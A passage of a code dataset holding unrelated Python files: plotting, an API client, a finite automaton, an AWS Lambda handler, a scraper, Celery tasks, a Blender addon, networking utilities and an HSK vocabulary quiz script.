осей\r\nplt.xlabel('X')\r\nplt.ylabel('Y')\r\n\r\n#назва графіка\r\nplt.title('Графік функції Y(x) = 5*sin(10*x)*sin(3*x)/(x^(1/2))')\r\n\r\n#легенда\r\nplt.legend()\r\n\r\n#відображення графіка\r\nplt.show()","repo_name":"lichueva/puthon","sub_path":"Візуалізація даних за допомогою Python бібліотек/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8270247060","text":"from typing import Any, Dict\n\nimport httpx\n\nfrom ...client import Client\nfrom ...types import Response\n\n\ndef _get_kwargs(\n id: str,\n geofence_id: str,\n *,\n client: Client,\n) -> Dict[str, Any]:\n url = \"{}/assets/{id}/geofences/{geofence_id}\".format(client.base_url, id=id, geofence_id=geofence_id)\n\n headers: Dict[str, str] = client.get_headers()\n cookies: Dict[str, Any] = client.get_cookies()\n\n return {\n \"method\": \"delete\",\n \"url\": url,\n \"headers\": headers,\n \"cookies\": cookies,\n \"timeout\": client.get_timeout(),\n }\n\n\ndef _build_response(*, response: httpx.Response) -> Response[Any]:\n return Response(\n status_code=response.status_code,\n content=response.content,\n headers=response.headers,\n parsed=None,\n )\n\n\ndef sync_detailed(\n id: str,\n 
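The retry-on-bad-input pattern above recurses (Employee().choose() calls itself on every ValueError), which can eventually exceed Python's recursion limit under repeated bad input. A loop-based sketch of the same behaviour:

def ask_int(prompt):
    while True:
        try:
            return int(input(prompt))
        except ValueError:
            print('You entered an incorrect value, try again!')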
geofence_id: str,\n *,\n client: Client,\n) -> Response[Any]:\n \"\"\"Delete Single Geofence\n\n Args:\n id (str): Asset ID Example: 272956057382HD3JBSD24.\n geofence_id (str): Example: 1140762987615GIDWGA.\n\n Returns:\n Response[Any]\n \"\"\"\n\n kwargs = _get_kwargs(\n id=id,\n geofence_id=geofence_id,\n client=client,\n )\n\n response = httpx.request(\n verify=client.verify_ssl,\n **kwargs,\n )\n\n return _build_response(response=response)\n\n\nasync def asyncio_detailed(\n id: str,\n geofence_id: str,\n *,\n client: Client,\n) -> Response[Any]:\n \"\"\"Delete Single Geofence\n\n Args:\n id (str): Asset ID Example: 272956057382HD3JBSD24.\n geofence_id (str): Example: 1140762987615GIDWGA.\n\n Returns:\n Response[Any]\n \"\"\"\n\n kwargs = _get_kwargs(\n id=id,\n geofence_id=geofence_id,\n client=client,\n )\n\n async with httpx.AsyncClient(verify=client.verify_ssl) as _client:\n response = await _client.request(**kwargs)\n\n return _build_response(response=response)\n","repo_name":"scorgn/lojack-clients","sub_path":"src/lojack_clients/services/api/default/delete_single_geofence.py","file_name":"delete_single_geofence.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29171988250","text":"import openpyxl as xl\nimport math\n\n\nbook = xl.load_workbook(\"App.xlsx\", data_only=True)\nhoja = book.active\ncelda = hoja['A2':'C60']\nnumero_telefono = []\ndatos = []\n\nfor fila in celda:\n numero = [celda.value for celda in fila]\n datos.append(numero)\n\nfor numeritos in datos:\n num = numeritos[2].split(\"(\")\n numero_telefono.append(num)\n\nlada = []\n\nfor evaluar in numero_telefono:\n lad = evaluar[0]\n lada.append(lad)\n\nn = 0\n#Variables ciudad que sirven para saber la cantidad exacta de cada ciudad. 
\nciudad1 = 0\nciudad2 = 0\nciudad3 = 0\nciudad4 = 0\nciudad5 = 0\nciudad6 = 0\nciudad7 = 0\nciudad8 = 0\nciudad9 = 0\nciudad10 = 0\nciudad11 = 0\ntotal = 0\ntotalin = 0\nwhile n < len(lada):\n with open(\"data.txt\") as f:\n lineas = f.readlines()\n \n i = 0\n lista = []\n\n while i < len(lineas):\n lin = lineas[i].replace(\"=\", \"\")\n lin = lin.replace(\" \", \"-\")\n lin = lin.replace(\"\\n\", \"\")\n lin = lin.replace(\"{\", \"\")\n lin = lin.replace(\"}\", \"\")\n lista.append(lin.split(\"-\"))\n i = i + 1\n\n q = lista[0][1].split(\",\")\n s = lista[1][1].split(\",\")\n\n # s.append('e')\n q0 = lista[2][1].split(\",\")\n f = lista[3][1].split(\",\")\n aux = lista[4][1]\n r = aux[1:len(aux)-1].split(\"),(\")\n estados = []\n i = 0\n while i < len(r):\n estados.append(r[i].split(\",\"))\n i = i + 1\n\n\n estado_final = False\n estados_actuales = []\n estados_actuales.append(q0[0])\n \n\n cadena = list(lada[n])\n\n while cadena:\n # print(\"evaluand la cadena >>>>\",cadena,\"<<<<\")\n if(cadena[0] in s):\n num_estados = len(estados_actuales)\n for i in range(len(estados)):\n for j in range(num_estados):\n if estados[i][0] == estados_actuales[j] and estados[i][1] == cadena[0]:\n estados_actuales.append(estados[i][2])\n #print(estados_actuales[j],\" dentro del for\")\n for y in range(num_estados):\n estados_actuales.remove(estados_actuales[0])\n #print(estados_actuales,\" fuera del for\")\n cadena.remove(cadena[0])\n else:\n #print(\"Un estado en la cadena no es valido\", \">>>\", cadena[0], \"<<<\")\n break\n\n \n if 'q1' in estados_actuales:\n ciudad1 = ciudad1 + 1\n elif 'q2'in estados_actuales:\n ciudad2 = ciudad2 + 1\n elif 'q4'in estados_actuales:\n ciudad3 = ciudad3 + 1\n elif 'q6'in estados_actuales:\n ciudad4 = ciudad4 + 1\n elif 'q8'in estados_actuales:\n ciudad5 = ciudad5 + 1\n elif 'q11' in estados_actuales:\n ciudad6 = ciudad6 +1\n elif 'q13'in estados_actuales:\n ciudad7 = ciudad7 + 1\n elif 'q15'in estados_actuales:\n ciudad8 = ciudad8 + 1\n elif 'q17'in estados_actuales:\n ciudad9 = ciudad9 + 1\n elif 'q19'in estados_actuales:\n ciudad10 = ciudad10 + 1\n elif 'q20' in estados_actuales:\n ciudad11 = ciudad11 + 1\n \n \n for i in range(len(estados_actuales)):\n if(estados_actuales[i] in f):\n estado_final = True\n break\n else:\n estado_final = False\n\n if estado_final == True:\n # print(\"cadena valida\")\n total = total +1\n else:\n totalin = totalin +1\n #print(\"cadena invalida\") \n n = n + 1\nprint(\"Hay un total de \",ciudad1,\" en la ciudad de Albania\")\nprint(\"Hay un total de \",ciudad2,\" en la ciudad de Finlandia\")\nprint(\"Hay un total de \",ciudad3,\" en la ciudad de Alemania\")\nprint(\"Hay un total de \",ciudad4,\" en la ciudad de Andorra\")\nprint(\"Hay un total de \",ciudad5,\" en la ciudad de Angola\")\nprint(\"Hay un total de \",ciudad6,\" en la ciudad de Antártida\")\nprint(\"Hay un total de \",ciudad7,\" en la ciudad de Arabia Saudita\")\nprint(\"Hay un total de \",ciudad8,\" en la ciudad de Argelia\")\nprint(\"Hay un total de \",ciudad9,\" en la ciudad de Cuba\")\nprint(\"Hay un total de \",ciudad10,\" en la ciudad de Armenia\")\nprint(\"Hay un total de \",ciudad11,\" en la ciudad de Ascensión, Isla\")\n\n\n","repo_name":"mauricioMatuz/AUTOMATAS","sub_path":"App/probando.py","file_name":"probando.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8485164522","text":"import json\nimport logging\nimport uuid\nimport 
urllib.request\n\nlogging.basicConfig()\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\ndef cfn_response(url: str, body: object) -> None:\n data = json.dumps(body).encode()\n headers = {\n 'content-type': 'application/json',\n 'content-length': str(len(data)),\n }\n req = urllib.request.Request(url, method='PUT', data=data, headers=headers)\n with urllib.request.urlopen(req) as res:\n res.read() # skip the body\n\n\ndef handler(event, context):\n data = {}\n for k, v in event['ResourceProperties'].items():\n data[k] = json.dumps(v, separators=(',', ':'), sort_keys=True)\n resourceId = event.get('PhysicalResourceId') or str(uuid.uuid4())\n ret = {\n 'Status': 'SUCCESS',\n 'StackId': event['StackId'],\n 'RequestId': event['RequestId'],\n 'LogicalResourceId': event['LogicalResourceId'],\n 'Data': data,\n 'PhysicalResourceId': resourceId,\n }\n cfn_response(event['ResponseURL'], ret)\n","repo_name":"shogo82148/cfn-json-string-macro","sub_path":"awslambda/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"11543170058","text":"import os\nfrom setuptools import setup, find_packages\n\n\n__version__ = '1.5.0'\n\n\nrequirements_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'requirements.txt')\nwith open(requirements_path) as requirements_file:\n requirements = requirements_file.readlines()\n\nkafka = ['confluent-kafka==1.0.0']\n\ncassandra = ['cassandra-driver==3.20.1']\n\nglue = ['boto3==1.10.1']\n\nsnowflake = [\n 'snowflake-connector-python',\n 'snowflake-sqlalchemy'\n]\n\nathena = ['PyAthena[SQLAlchemy]>=1.0.0']\n\n# Python API client for google\n# License: Apache Software License\n# Upstream url: https://github.com/googleapis/google-api-python-client\nbigquery = [\n 'google-api-python-client>=1.6.0, <2.0.0dev',\n 'google-auth-httplib2>=0.0.1'\n 'google-auth>=1.0.0, <2.0.0dev'\n]\n\nall_deps = requirements + kafka + cassandra + glue + snowflake + athena + bigquery\n\nsetup(\n name='amundsen-databuilder',\n version=__version__,\n description='Amundsen Data builder',\n url='https://www.github.com/lyft/amundsendatabuilder',\n maintainer='Lyft',\n maintainer_email='dev@lyft.com',\n packages=find_packages(exclude=['tests*']),\n dependency_links=[],\n install_requires=requirements,\n extras_require={\n ':python_version==\"2.7\"': ['typing>=3.6'], # allow typehinting PY2\n 'all': all_deps,\n 'kafka': kafka, # To use with Kafka source extractor\n 'cassandra': cassandra,\n 'glue': glue,\n 'snowflake': snowflake,\n 'athena': athena,\n 'bigquery': bigquery\n },\n)\n","repo_name":"metadataxpress/metadataxpress","sub_path":"amundsendatabuilder/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"44976316566","text":"from heartandsole.core.fields.base import ActivityField\nfrom heartandsole.compat._optional import import_optional_dependency\n\n\nclass DistanceField(ActivityField):\n \n _field_name = 'distance'\n\n def total(self, source='records'):\n \"\"\"Return total distance in meters.\n\n Args:\n source (str): Source from which to obtain total distance.\n \n - ``records`` (default): last cumulative distance value in the \n records DataFrame.\n - ``summary``: ``total`` value in the summary Series.\n - ``laps``: sum of ``total`` column in the laps DataFrame.\n - ``position``: last cumulative distance 
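The handler above serialises each resource property with separators=(',', ':') and sort_keys=True, so equal inputs always produce byte-identical strings — a property worth a one-line check:

import json

assert json.dumps({"b": 1, "a": 2}, separators=(",", ":"), sort_keys=True) == '{"a":2,"b":1}'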
value in the Series\n calculated by :meth:`Activity.distance.records_from_position`.\n \n Returns:\n float or None: Total distance according to the requested source. \n If the Activity does not possess the requested data source, return None.\n\n Raises:\n ValueError: If source is not a valid option.\n\n See also:\n :meth:`Activity.distance.records_from_position`\n Calculate cumulative distance from GPS coordinates.\n \n \"\"\"\n if source == 'records':\n if self.stream is not None:\n return self.stream.iloc[-1]\n elif source == 'summary':\n if 'total' in self.summary.index:\n return self.summary['total']\n elif source == 'laps':\n if 'total' in self.laps.columns:\n return self.laps['total'].sum()\n elif source == 'position':\n if self.activity.has_position:\n return self.records_from_position().iloc[-1]\n else:\n raise ValueError('Arg must be one of: \"records\", \"summary\", \"laps\", \"position\"')\n \n\n # @property\n def records_from_position(self, inplace=False):\n \"\"\"Cumulative distance records calculated from GPS coordinate records.\n\n Args:\n inplace (bool): Whether to add the Series result as a column to the\n records DataFrame. Default False.\n\n Returns:\n pandas.Series or None: The Series result or None if ``inplace=True``\n or if the records DataFrame does not contain ``lat`` and ``lon`` columns.\n\n Examples:\n\n When called with ``inplace=False``, this method returns a Series:\n \n >>> records = pd.DataFrame({\n ... 'lat': [40.0, 40.0001, 40.0002],\n ... 'lon': [-105.2, -105.2, -105.2]\n ... })\n >>> act = Activity(records)\n >>> act.distance.records_from_position()\n 0 0.000000\n 1 11.119493\n 2 22.238985\n dtype: float64\n\n When called with ``inplace=True``, this method updates the records\n DataFrame:\n\n >>> act.distance.records_from_position(inplace=True)\n >>> act.records\n lat lon distance\n 0 40.0000 -105.2 0.000000\n 1 40.0001 -105.2 11.119493\n 2 40.0002 -105.2 22.238985\n\n See also:\n\n :meth:`pandas.DataFrame.xyz.s_from_xy`\n Custom DataFrame accessor method for calculating cumulative distance\n from GPS coordinates. 
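A rough standalone equivalent of the pandas-xyz distance calculation referenced above — a sketch using the haversine formula on plain lists, not the library implementation itself:

import math

def cumulative_distance(lats, lons, radius=6371000.0):
    total, out = 0.0, [0.0]
    for la1, lo1, la2, lo2 in zip(lats, lons, lats[1:], lons[1:]):
        dphi = math.radians(la2 - la1)
        dlmb = math.radians(lo2 - lo1)
        a = (math.sin(dphi / 2) ** 2
             + math.cos(math.radians(la1)) * math.cos(math.radians(la2)) * math.sin(dlmb / 2) ** 2)
        total += 2 * radius * math.asin(math.sqrt(a))
        out.append(total)
    return out

# matches the docstring example to within rounding: ~11.12 m per 0.0001 deg of latitude
print(cumulative_distance([40.0, 40.0001, 40.0002], [-105.2, -105.2, -105.2]))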
From the ``pandas-xyz`` package.\n\n \"\"\"\n\n if self.activity.has_position:\n\n # Option 1 (untested, might need work):\n # pxyz = import_optional_dependency('pandas_xyz')\n # return pxyz.algorithms.s_from_xy(\n # self.activity.lat.stream,\n # self.activity.lon.stream\n # )\n\n # Option 2:\n import_optional_dependency('pandas_xyz')\n\n # If no kwargs, assumes stream names are 'lat' and 'lon'\n distance_stream = self.activity.records.xyz.s_from_xy(\n lat=self.activity.lat.record_stream_label, # or ._field_name\n lon=self.activity.lon.record_stream_label,\n )\n\n if not inplace:\n return distance_stream\n\n self.activity.records[self.record_stream_label] = distance_stream","repo_name":"aaron-schroeder/heartandsole","sub_path":"heartandsole/core/fields/distance.py","file_name":"distance.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"42168233667","text":"from time import sleep\nfrom celery import shared_task\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_book(nombre, mail):\n sleep(20) # Simulates very heavy operations that would freeze Django\n print(\n nombre + \" \" + mail\n )\n\n\n\n@shared_task\ndef enviar_correo(nombre, mail):\n \n send_mail(\n 'Subject here',\n 'Here is the message.',\n 'from@example.com',\n [mail],\n fail_silently=False,\n )\n\n return \"email sent\"","repo_name":"angelbonillago/sesiones_silabuz","sub_path":"sesiones/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31580030516","text":"import bpy\nimport bmesh\nimport operator\nfrom mathutils import Vector\nfrom collections import defaultdict\nfrom math import pi\nimport math\nfrom . 
import utilities_meshtex\n\n\n\nclass op(bpy.types.Operator):\n\tbl_idname = \"uv.textools_meshtex_wrap\"\n\tbl_label = \"Wrap Mesh Texture\"\n\tbl_description = \"Swap UV to XYZ coordinates\"\n\tbl_options = {'REGISTER', 'UNDO'}\n\n\t@classmethod\n\tdef poll(cls, context):\n\t\tif not bpy.context.active_object or bpy.context.active_object.mode != 'OBJECT':\n\t\t\treturn False\n\t\t\t\n\t\t# Wrap texture mesh around UV mesh\n\t\tif len(bpy.context.selected_objects) >= 1:\n\t\t\t# Find a UV mesh\n\t\t\tif utilities_meshtex.find_uv_mesh(bpy.context.selected_objects):\n\t\t\t\t# Find 1 or more meshes to wrap\n\t\t\t\tif len( utilities_meshtex.find_texture_meshes(bpy.context.selected_objects)) > 0:\n\t\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef execute(self, context):\n\t\twrap_meshtex(self)\n\t\treturn {'FINISHED'}\n\n\n\ndef wrap_meshtex(self):\n\t# Wrap the mesh texture around the \n\tprint(\"Wrap Mesh Texture :)\")\n\n\t# Collect UV mesh\n\tobj_uv = utilities_meshtex.find_uv_mesh(bpy.context.selected_objects)\n\tif not obj_uv:\n\t\tself.report({'ERROR_INVALID_INPUT'}, \"No UV mesh found\" )\n\t\treturn\n\n\t# Collect texture meshes\n\tobj_textures = utilities_meshtex.find_texture_meshes( bpy.context.selected_objects )\n\n\tif len(obj_textures) == 0:\n\t\tself.report({'ERROR_INVALID_INPUT'}, \"No meshes found for mesh textures\" )\n\t\treturn\n\n\tprint(\"Wrap {} texture meshes\".format(len(obj_textures)))\n\n\t# Undo wrapping\n\tif bpy.context.scene.texToolsSettings.meshtexture_wrap > 0:\n\t\tbpy.context.scene.texToolsSettings.meshtexture_wrap = 0\n\t\t# Clear modifiers\n\t\tutilities_meshtex.uv_mesh_clear(obj_uv)\n\t\treturn\n\t\n\t# Setup Thickness\n\tutilities_meshtex.uv_mesh_fit(obj_uv, obj_textures)\n\n\tfor obj in obj_textures:\n\t\t# Delete previous modifiers\n\t\tfor modifier in obj.modifiers:\n\t\t\tif modifier.type == 'SURFACE_DEFORM':\n\t\t\t\tobj.modifiers.remove(modifier)\n\t\t\t\tbreak\n\n\t\t# Add mesh modifier\n\t\tmodifier_deform = obj.modifiers.new(name=\"SurfaceDeform\", type='SURFACE_DEFORM')\n\t\tmodifier_deform.target = obj_uv\n\n\t\tobj.select = True\n\t\tbpy.context.scene.objects.active = obj\n\t\tbpy.ops.object.surfacedeform_bind(modifier=\"SurfaceDeform\")\n\n\t# Apply wrapped morph state\n\tbpy.context.scene.texToolsSettings.meshtexture_wrap = 1\n","repo_name":"Calinou/textools-blender","sub_path":"addons/textools/op_meshtex_wrap.py","file_name":"op_meshtex_wrap.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"41548718599","text":"from datetime import datetime, timezone\nfrom urllib.parse import urlsplit\nfrom os import name as os_name\nimport json\nimport socket\nimport threading\nimport time\nimport ssl\nif os_name == \"nt\":\n SetConsoleTitleW = __import__(\"ctypes\").windll.kernel32.SetConsoleTitleW\n\nclass ChunkCounter:\n def __init__(self):\n self._count = 0\n self._lock = threading.Lock()\n \n def add(self, delta):\n with self._lock:\n self._count += delta\n \n def wait(self, interval):\n time.sleep(interval)\n with self._lock:\n count = self._count\n self._count = 0\n return count\n\ndef send_webhook(url, **kwargs):\n payload = json.dumps(kwargs, separators=(\",\", \":\"))\n hostname, path = url.split(\"://\", 1)[1].split(\"/\", 1)\n if \":\" in hostname:\n hostname, port = hostname.split(\":\", 1)\n port = int(port)\n else:\n port = 443 if \"https\" in url else 80\n sock = create_ssl_socket((hostname, port), ssl_wrap=\"https\" in url)\n 
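# hand-rolled HTTP POST: write the request line, headers and JSON body, then read a single response chunk before closing\n 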
try:\n sock.send(f\"POST /{path} HTTP/1.1\\r\\n\"\n f\"Host: {hostname}\\r\\n\"\n f\"Content-Length: {len(payload)}\\r\\n\"\n \"Content-Type: application/json\\r\\n\"\n \"\\r\\n\"\n f\"{payload}\".encode())\n sock.recv(1024 ** 2)\n finally:\n shutdown_socket(sock)\n\ndef make_embed(group_info):\n return dict(\n title=\"Found claimable group\",\n url=f\"https://www.roblox.com/groups/{group_info['id']}\",\n fields=[\n dict(name=\"Group Id\", value=group_info[\"id\"]),\n dict(name=\"Group Name\", value=group_info[\"name\"]),\n dict(name=\"Group Members\", value=group_info[\"memberCount\"]),\n dict(name=\"Group Funds\", value=f\"R$ {group_info['funds']}\" if group_info.get(\"funds\") is not None else \"?\")\n ],\n footer=dict(\n text=\"github.com/h0nde/roblox-group-scanner-v2\"\n ),\n timestamp=datetime.now(timezone.utc).isoformat()\n )\n\ndef create_ssl_socket(addr, ssl_context=None, proxy_addr=None, ssl_wrap=True, timeout=5):\n if ssl_wrap:\n ssl_context = ssl_context or ssl.create_default_context()\n sock = None\n \n try:\n sock = socket.socket()\n sock.settimeout(timeout)\n sock.connect(proxy_addr or addr)\n\n if proxy_addr:\n sock.send(f\"CONNECT {addr[0]}:{addr[1]} HTTP/1.1\\r\\n\\r\\n\".encode())\n if not sock.recv(1024).startswith(b\"HTTP/1.1 20\"):\n raise ConnectionRefusedError(\n \"Proxy server did not return a correct response for tunnel request\")\n\n if ssl_wrap:\n sock = ssl_context.wrap_socket(sock, server_hostname=addr[0])\n return sock\n \n except:\n shutdown_socket(sock)\n raise\n\ndef shutdown_socket(sock):\n if sock:\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except OSError:\n pass\n sock.close()\n\ndef slice_list(lst, num, total):\n per = int(len(lst)/total)\n chunk = lst[per * num : per * (num + 1)]\n return chunk\n\ndef slice_range(r, num, total):\n per = int((r[1]-r[0]+1)/total)\n return (\n r[0] + (num * per),\n r[0] + ((num + 1) * per)\n )\n\ndef update_stats(text):\n if os_name == \"nt\":\n SetConsoleTitleW(text)\n else:\n print(text)\n\ndef set_cpu_affinity(cpu_num):\n if os_name == \"nt\":\n from .windows import set_cpu_affinity\n return set_cpu_affinity(0, 1 << cpu_num)\n else:\n import os # only os.name is imported at module level, so import os here before using it\n os.sched_setaffinity(0, [cpu_num])","repo_name":"cherryreddrawz/ll","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9031573458","text":"from fractions import Fraction\n\nclass myclass:\n \n def __init__(self,L1):\n self.list1=[]\n for i in L1:\n if type(i)==int or type(i)==float or type(i)==Fraction:\n self.list1.append(i)\n\n def show(self):\n for k in self.list1:\n print(k, end=\" \")\n print()\n \n def mean(self):\n print(\"The mean of the elements in the list field is: \",sum(self.list1)/len(self.list1))\n \nlist2=[12,2.3,\"wheel\",7/8,\"stuff\",64] \nobj1=myclass(list2)\nobj1.show()\nobj1.mean()\n\nobj2=myclass([120,23,19,56,68])\nobj2.show()\nobj2.mean()\n","repo_name":"AntonUpro/Learn-Python","sub_path":"chapter 8/task 3.py","file_name":"task 3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36408628911","text":"# Import the required modules\nimport re\nimport requests\nimport pickle\n\n# Define the base URL of the page to crawl and the HTTP request header template\nbase_url = \"https://www.transfermarkt.fr/spieler-statistik/wertvollstespieler/marktwertetop?page={}\"\nrequest_headers={'User-Agent': 
\"(Mozilla/5.0 (Windows; U; Windows NT 6.0 \\;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6\" }\n\n# fonction pour extraire une sous-chaîne de texte entre deux chaînes spécifiées\ndef pap(X,Y):\n pattern = X +'(.+?(?=' + Y + '))' # utiliser les expressions régulières pour trouver la sous-chaîne entre X et Y\n return(re.findall(pattern,html)) # rechercher le motif dans le texte et renvoyer la sous-chaîne trouvée\n\n# fonction qui recherche et affiche un extrait de texte autour de la chaîne X dans le texte txt\ndef find(X):\n print(html[html.find(X)-500:html.find(X)+500])\n\n# Liste pour stocker les URL des joueurs\nurl_joueur = []\n\n# Boucle sur les pages de résultats de recherche\nfor page_num in range(1, 21):\n url = base_url.format(page_num) # Construction de l'URL de la page à parcourir\n response = requests.get(url, headers=request_headers) # Envoi d'une requête HTTP pour récupérer la page\n html = response.text # Extraction du contenu HTML\n\n # Extraire les noms et les URL des joueurs à partir du code HTML de la page\n url_j = pap('
    ')\n for joueur in url_j:\n url_joueur.append(joueur[1])\n\n# Save the URLs of all the players to a pickle file for later use\npickle.dump (url_joueur, open('Data/url_joueur.dat', 'wb'))\n\n \n","repo_name":"Blizzarman/TransfertMarket","sub_path":"Scraping/Request/Étape 1 - scrap_url.py","file_name":"Étape 1 - scrap_url.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15393326623","text":"#!/usr/bin/python3\n\"\"\"\nScript to control progress of HSK vocabulary learning\n\"\"\"\n\nimport sys\nimport random\n\n\ndef load_hsk_vocabulary(filename):\n \"\"\"\n Loads HSK vocabulary from the given file.\n \"\"\"\n result = []\n\n with open(filename) as input_file:\n for line in input_file:\n hieroglyph = \"\"\n reading = \"\"\n meaning = \"\"\n vocabulary_line = line.split('\\t')\n hieroglyph = vocabulary_line[0].strip()\n reading = vocabulary_line[1].strip()\n meaning = vocabulary_line[2].strip()\n result.append((hieroglyph, reading + \"\\t\\t\" + meaning))\n\n return result\n\n\ndef known_dict_to_vocabulary(known_dict, vocabulary):\n \"\"\"\n Creates known HSK vocabulary from the given known words list\n and full HSK vocabulary.\n \"\"\"\n result = []\n\n for word in vocabulary:\n if known_dict.get(word[0], False):\n result.append(word)\n\n return result\n\n\ndef load_known_words(filename):\n \"\"\"\n Loads known words from the given filename.\n \"\"\"\n result = {}\n with open(filename) as input_file:\n for line in input_file:\n if ';' in line:\n result[line.strip().split(';')[0]] = True\n elif '\\t' in line:\n result[line.strip().split('\\t')[0]] = True\n else:\n result[line.strip()] = True\n return result\n\n\ndef print_vocabulary(print_array, exclusions=None):\n \"\"\"\n Prints the given vocabulary to stdout\n \"\"\"\n if exclusions is None:\n exclusions = {}\n\n counter = 0\n for word in print_array:\n if len(exclusions) > 0:\n if exclusions.get(word[0], False):\n continue\n counter += 1\n if len(word[0]) < 3:\n print(counter, \"\\t\", word[0], \"\\t\", word[1])\n else:\n print(counter, \"\\t\", word[0], word[1])\n\n\ndef print_progress(learn_words, known_words):\n \"\"\"\n Prints the learning words progress to stdout.\n \"\"\"\n need_to_learn_count = len(learn_words)\n for word in learn_words:\n if len(known_words) > 0:\n if known_words.get(word[0], False):\n need_to_learn_count = need_to_learn_count - 1\n\n start_learn_count = len(learn_words)\n\n print(\"\\nLearned \" + str(start_learn_count - need_to_learn_count) + \":\")\n print('*' * (start_learn_count - need_to_learn_count))\n print(\"\\nNeed to learn \" + str(need_to_learn_count) +\n \"/\" + str(start_learn_count) + \":\")\n print(\"*\" * need_to_learn_count)\n print(\"\")\n\n\ndef get_args():\n \"\"\"\n Returns the args dictionary based on args passed to the script.\n \"\"\"\n\n result = {\n 'hsk-vocabulary-file': 'hsk-vocab.txt',\n 'known-words-file': 'words.duo',\n 'print-full-hsk': False,\n 'print-remaining-hsk': False,\n 'print-known-hsk': False,\n 'print-progress': False,\n 'play-game': False\n }\n\n usage_message = \"\"\"\n Usage: python3 check_hsk_vocab.py\n\n Parameters:\n print-full-hsk Print full HSK vocabulary from the appropriate file.\n print-remaining-hsk Print HSK vocabulary words that are still unknown.\n print-known-hsk Print only known HSK words with meanings from HSK vocabulary.\n print-progress Print graphics \"I know this count - I need to learn this count\".\n 
print-non-hsk Print non HSK words from the known wordlist file.\n play-game Run simple question game to check known words.\n \"\"\"\n\n if len(sys.argv) == 1:\n print(usage_message)\n else:\n for arg in sys.argv[1:]:\n if arg == 'print-full-hsk':\n result['print-full-hsk'] = True\n elif arg == 'print-remaining-hsk':\n result['print-remaining-hsk'] = True\n elif arg == 'print-known-hsk':\n result['print-known-hsk'] = True\n elif arg == 'print-progress':\n result['print-progress'] = True\n elif arg == 'play-game':\n result['play-game'] = True\n\n return result\n\n\ndef game_get_question_data(vocabulary):\n \"\"\"\n Returns question entities\n \"\"\"\n max_number = len(vocabulary) - 1\n result_answer_word = random.randint(0, max_number)\n result_choises = [result_answer_word, -1, -1, -1]\n answers_count = 4\n\n for index in range(1, answers_count):\n while True:\n answer_number = random.randint(0, max_number)\n if answer_number not in result_choises:\n result_choises[index] = answer_number\n break\n\n random.shuffle(result_choises)\n\n return result_answer_word, result_choises\n\n\ndef game_print_question(vocabulary, shown_word_number, shown_choices):\n \"\"\"\n Prints question to stdout\n \"\"\"\n print(\"\\n\\t\\t\\t\", vocabulary[shown_word_number][0], \"\\n\")\n index = 0\n for choise in shown_choices:\n index += 1\n print(str(index) + \")\", vocabulary[choise][1])\n\n\ndef play_game(known_vocabulary):\n \"\"\"\n Runs game to refresh knowledge\n \"\"\"\n user_choise = -1\n\n while int(user_choise) != 0:\n word_number, choises = game_get_question_data(known_vocabulary)\n\n game_print_question(known_vocabulary, word_number, choises)\n\n user_choise = input(\"\\nEnter your choice (0 for exit): \")\n\n try:\n if int(user_choise) == 0:\n print(\"\\n\\t\\t\\tGood bye!\\n\")\n elif int(user_choise) == choises.index(word_number) + 1:\n print(\"\\n\\t\\t\\tRight!\\n\")\n else:\n print(\"\\n\\t\\t\\tWrong! Right answer:\",\n choises.index(word_number) + 1, \"\\n\")\n except Exception as ex:\n print(\n \"\\n\\t\\t\\tYour choice is not acceptable! 
Type only numbers from 1 to 4!\\n\")\n print(\"\\t\\t\\t\", str(ex))\n user_choise = -1\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n start_args = get_args()\n\n known_words = load_known_words(start_args['known-words-file'])\n hsk_vocabulary = load_hsk_vocabulary(start_args['hsk-vocabulary-file'])\n\n if start_args['print-known-hsk']:\n print(\"\\nYou know these words:\\n\")\n print_vocabulary(known_dict_to_vocabulary(known_words, hsk_vocabulary))\n\n if start_args['print-remaining-hsk']:\n print(\"\\nYou should learn these words:\\n\")\n print_vocabulary(hsk_vocabulary, exclusions=known_words)\n\n if start_args['print-full-hsk']:\n print(\"\\nHSK Vocabulary:\\n\")\n print_vocabulary(hsk_vocabulary)\n\n if start_args['print-progress']:\n print_progress(hsk_vocabulary, known_words)\n\n if start_args['play-game']:\n play_game(known_dict_to_vocabulary(known_words, hsk_vocabulary))\n\n\nif __name__ == \"__main__\":\n 